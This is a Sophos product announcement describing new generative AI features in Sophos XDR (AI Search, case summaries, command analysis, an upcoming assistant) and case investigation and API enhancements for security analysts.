PRODUCTS

Sophos XDR: New generative AI functionality and case investigation enhancements

Defenders need all the help they can get. The Sophos XDR team has been focused on delivering features and functionality that will expand and improve analysts’ efficiency and ability to detect and neutralize threats faster.

The latest enhancements expand the power and capabilities of Sophos XDR with generative AI (GenAI) and new case investigation functionality. The GenAI features are focused on delivering outcomes such as accelerated investigations, enabling less experienced analysts to do security operations and neutralize adversaries faster.

GenAI capabilities are available as an opt-in for all licensed Sophos XDR customers, ensuring they remain in control. Customers can opt into these features in Sophos Central.

AI Search

AI Search helps security analysts by allowing them to search large volumes of security data using natural language. This makes it easier to conduct investigations without needing advanced technical knowledge like SQL.

Powered by OpenAI’s large language models (LLMs), AI Search translates natural language queries into structured SQL queries that are executed against Sophos’ data lake.

Users can ask simple questions (e.g., “Show me all detections from the last week related to Windows Server”) and view results in a user-friendly format.

For more details, please refer to the AI Search article on the Sophos Community.

AI Case Summary

AI Case Summary provides an easy-to-understand overview of detections and recommended next steps, helping analysts make smart decisions fast.

This feature uses GenAI to analyze detections associated with a case to summarize what has happened, the entities involved, and possible next steps for investigation.

AI Case Summary also determines which MITRE ATT&CK tactics, techniques and procedures (TTPs) are observed within the case, if any.

AI Command Analysis

AI Command Analysis provides insights into attacker behavior by examining potentially malicious commands that create detections.

This feature uses GenAI to analyze the command line executed in the customer’s environment to explain the intent and describe the possible security impact on the environment. AI Command Analysis will de-obfuscate code, minimizing the complexity, time, and skills needed to assess a detection.

Coming Soon: AI Assistant

The Sophos AI Assistant is a collaborative chat interface designed to elevate security operations with a collaborative, conversational interface.

Underpinned by the Sophos Data Lake and a set of robust tools, the AI Assistant streamlines complex investigations using GenAI to improve threat response, no matter the level of expertise.

Sophos and AI

Sophos combines AI and human expertise to stop the broadest range of threats wherever they occur. Security analysts are empowered to make smart decisions fast, and customers can operate confidently, knowing Sophos’ robust, battle-proven AI solutions are on their side.

Since 2017, Sophos has been elevating cybersecurity with AI. Deep learning and GenAI capabilities are embedded at every point and delivered through the industry’s largest, most scalable, open AI platform.

Sophos’ AI-powered products and services secure over 600,000 organizations from cyberattacks and breaches.

New case investigation enhancements

When an analyst looks at the specifics of a detection as a part of a case, they now benefit from a refreshed and simplified interface of the pivot menu for new quick actions and updated queries.

The pivot menu allows an analyst to select key information from a detection, using it as a starting point for deeper investigation and immediate action.

Here’s what’s new:

  • Run actions: We have added the ability to isolate and un-isolate devices directly from the pivot menu, allowing users to remediate quickly without losing context
  • Run Live Discover and Search Data Lake: The queries list has been updated to feature the most frequently used queries
  • Copy Device Name: Easily copy the device name to the clipboard
  • Detections with Device: Go straight to the detections page to see all detections associated with the device; the default time range is the last 24 hours
  • Device Details: Navigate directly to the device details page for more in-depth information

The Cases public API has also been enhanced, allowing customers and partners to create, update, and delete cases using their preferred tools.

With this new functionality, customers can easily modify key fields such as case status, severity, and case summary, enabling more effective prioritization and faster triage times.

These improvements are designed to give customers more flexibility in their workflows and help address issues more efficiently. Please refer to the Cases API Guide for more details.

Source: Sophos